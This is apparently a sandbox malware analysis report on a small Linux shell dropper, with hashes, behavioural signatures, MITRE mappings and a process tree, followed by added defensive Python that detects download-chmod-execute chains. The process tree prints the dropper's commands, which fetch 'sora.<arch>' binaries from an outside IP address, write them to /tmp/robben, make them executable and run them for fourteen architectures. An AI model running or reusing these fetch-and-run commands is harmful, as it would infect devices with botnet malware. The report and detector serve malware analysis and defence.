Analysis
max time kernel: 10s
max time network: 11s
platform: debian-9_armhf
resource: debian9-armhf-20240729-en (this page shows the results of behavioral2 below)
resource tags: arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 18/10/2024, 02:04

Tasks (all run the same sample, 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh):
  static1      static task
  behavioral1  resource ubuntu1804-amd64-20240611-en
  behavioral2  resource debian9-armhf-20240729-en
  behavioral3  resource debian9-mipsbe-20240611-en
  behavioral4  resource debian9-mipsel-20240729-en
General
Target: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Size: 2KB
MD5: 5d873bf46fd4ff411eb17e42d5ae2980
SHA1: fd73b1bb3b7241d68fcaac4f4bf9cc6164b6fa06
SHA256: 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d
SHA512: f58f94eaa5f9440db6b1c41915be89331d7355904631d3ede46adfd517e493b3e49979d0ad0a535d8d6181ac81e0d19d6ba0dcb33765b54bbc16830828cc6382
Malware Config
Signatures

File and Directory Permissions Modification (1 TTP, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Process: chmod, PIDs 679, 693, 700, 706, 714, 727, 740, 752, 764, 778, 792, 800, 806, 813 (one chmod +x per architecture round, see Processes).

Executes dropped EXE (14 IoCs)
IoC: /tmp/robben, process robben, PIDs 681, 694, 701, 707, 715, 728, 742, 753, 765, 781, 793, 801, 807, 815 (one execution per architecture round).

Checks CPU configuration (1 TTP, 14 IoCs)
Checks CPU information, which can indicate whether the system is a virtual machine.
IoC: /proc/cpuinfo opened for reading, 14 times, every time by curl.
Note for triage: all 14 reads are attributed to curl, the downloader the script invokes, and none to the dropped robben binary. They most likely reflect the downloader's own library start-up (CPU feature detection) rather than sandbox evasion by the payload, so this hit should not be read as evidence that the malware fingerprints the machine.

Reads runtime system information (28 IoCs)
(The heading was missing from the extracted page; the name is the one the process tree below uses for the same curl processes.)
IoC: /proc/sys/crypto/fips_enabled opened for reading, 14 times, by curl.
IoC: /proc/self/auxv opened for reading, 14 times, by curl.
The same attribution note applies: every read comes from curl, not from the dropped payload.

System Network Configuration Discovery (1 TTP, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
Processes: PID 684 wget, PID 687 curl, PID 691 cat (the mips round; the other rounds' wget, curl and cat are not tagged).

Writes file to tmp directory (1 IoC)
Malware often drops required files in the /tmp directory.
IoC: /tmp/robben opened for modification by 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh (the script process itself, PID 655, not cat).
Processes

PID 655: /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
  Tags: Writes file to tmp directory

Every other process is a direct child of 655. The script runs the same five commands once per target architecture, in this order, always against the same host:

  /usr/bin/wget   wget http://93.123.85.141/bins/sora.<arch>
  /usr/bin/curl   curl -O http://93.123.85.141/bins/sora.<arch>
                  Tags: Checks CPU configuration, Reads runtime system information
  /bin/cat        cat sora.<arch>
  /bin/chmod      chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe
                  Tags: File and Directory Permissions Modification
  /tmp/robben     ./robben Payload
                  Tags: Executes dropped EXE

Rounds in execution order, with the PID reported for each command. <arch> is spelled exactly as in the URL, including "i468".

  arch       wget  curl  cat  chmod  ./robben
  x86        657   666   676  679    681
  mips       684   687   691  693    694
  x86_64     696   698   699  700    701
  i468       703   704   705  706    707
  i686       709   710   713  714    715
  mpsl       719   722   725  727    728
  arm4       731   734   738  740    742
  arm5       744   747   750  752    753
  arm6       756   759   762  764    765
  arm7       768   772   776  778    781
  ppc        784   787   791  792    793
  ppc440fp   796   797   799  800    801
  m68k       803   804   805  806    807
  sh4        809   810   812  813    815

Notes on the tree:
  The mips round's wget (684), curl (687) and cat (691) additionally carry the System Network Configuration Discovery tag.
  The chmod argument list is the script, robben and a systemd-private-... directory, i.e. the entries present in /tmp at that moment, which is consistent with `chmod +x *` being run from /tmp.
  The page records only `cat sora.<arch>` as the command line, while the write to /tmp/robben is attributed to the script process (655). That is consistent with the shell redirecting cat's output into robben; the redirection itself is not visible in the extracted command line.
  Each round overwrites and re-executes the same path, /tmp/robben, so the fourteen "Executes dropped EXE" hits are fourteen attempts to run whichever architecture's binary was written last.
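The process tree above is the record a responder usually has to work from, so the following added example (written for this page, not part of the sandbox report or of the sample) rebuilds the per-architecture download, chmod +x, execute rounds from a constructed copy of that process list and reduces them to the indicators worth acting on: the download host, the dropped path, and the PID pairs that link each chmod to the execution it enabled. The process records are constructed from the report's own PIDs, images and command lines for three of the fourteen rounds; the staging directories other than /tmp are an assumption added for generality.

```python
"""Added example, not part of the sandbox report: pair each execution of a
binary from a staging directory with the download and chmod +x that preceded
it, using process records constructed from the report's Processes section."""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"]+")
# /tmp is what the report shows; /var/tmp and /dev/shm are an assumption
# added so the same check covers the other usual world-writable drop points.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

SCRIPT = "7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh"
BASE = "http://93.123.85.141/bins/sora."
# The chmod argument list exactly as the report shows it.
CHMOD_ARGS = (SCRIPT + " robben "
              "systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-VIeKBe")


def constructed_process_log():
    """Three of the report's fourteen rounds (x86, mips, arm7) with the PIDs
    the report lists; the remaining rounds differ only in arch and PIDs."""
    procs = [{"pid": 655, "image": "/tmp/" + SCRIPT, "argv": "/tmp/" + SCRIPT}]
    rounds = [("x86", 657, 666, 676, 679, 681),
              ("mips", 684, 687, 691, 693, 694),
              ("arm7", 768, 772, 776, 778, 781)]
    for arch, wget, curl, cat, chmod, run in rounds:
        procs += [
            {"pid": wget, "image": "/usr/bin/wget", "argv": f"wget {BASE}{arch}"},
            {"pid": curl, "image": "/usr/bin/curl", "argv": f"curl -O {BASE}{arch}"},
            {"pid": cat, "image": "/bin/cat", "argv": f"cat sora.{arch}"},
            {"pid": chmod, "image": "/bin/chmod", "argv": f"chmod +x {CHMOD_ARGS}"},
            {"pid": run, "image": "/tmp/robben", "argv": "./robben Payload"},
        ]
    return procs


def find_drop_execute_chains(procs):
    """Walk the processes in order. An execution whose image lives under a
    staging directory is reported only if the most recent chmod +x named that
    file; the reported chain carries the last download URL seen before it.
    The sample script (pid 655) also runs from /tmp but precedes any chmod,
    so it is correctly left out."""
    chains, last_url, last_chmod = [], None, None
    for p in procs:
        image, argv = p["image"], p["argv"]
        if image.endswith(("/wget", "/curl")):
            m = URL_RE.search(argv)
            if m:
                last_url = m.group(0)
        elif image.endswith("/chmod") and "+x" in argv.split():
            last_chmod = p
        elif image.startswith(STAGING_DIRS):
            name = image.rsplit("/", 1)[1]
            if last_chmod and name in last_chmod["argv"].split():
                chains.append({
                    "url": last_url,
                    # The dropper names files sora.<arch>, so the suffix is the arch.
                    "arch": last_url.rsplit(".", 1)[1] if last_url else None,
                    "dropped": image,
                    "chmod_pid": last_chmod["pid"],
                    "exec_pid": p["pid"],
                })
    return chains


def payload_hosts(chains):
    """Distinct download hosts: the addresses to block and hunt for."""
    return {urlparse(c["url"]).hostname for c in chains if c["url"]}


if __name__ == "__main__":
    found = find_drop_execute_chains(constructed_process_log())
    for c in found:
        print(f"{c['arch']:>5}: {c['url']} -> {c['dropped']} "
              f"(chmod pid {c['chmod_pid']}, exec pid {c['exec_pid']})")
    print("payload host(s):", ", ".join(sorted(payload_hosts(found))))
```

The ordering rule (most recent chmod +x naming the file, then an execution from a staging directory) is what separates the dropped payload from the sample script itself, which also runs from /tmp but is never chmod'ed before it starts; on a real endpoint feed the same walk works over execve and chmod events sorted by time.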
Network

MITRE ATT&CK Enterprise v15
Defense Evasion
  File and Directory Permissions Modification, T1222 (1)
    Linux and Mac File and Directory Permissions Modification, T1222.002 (1)
  Virtualization/Sandbox Evasion, T1497 (1)
    System Checks, T1497.001 (1)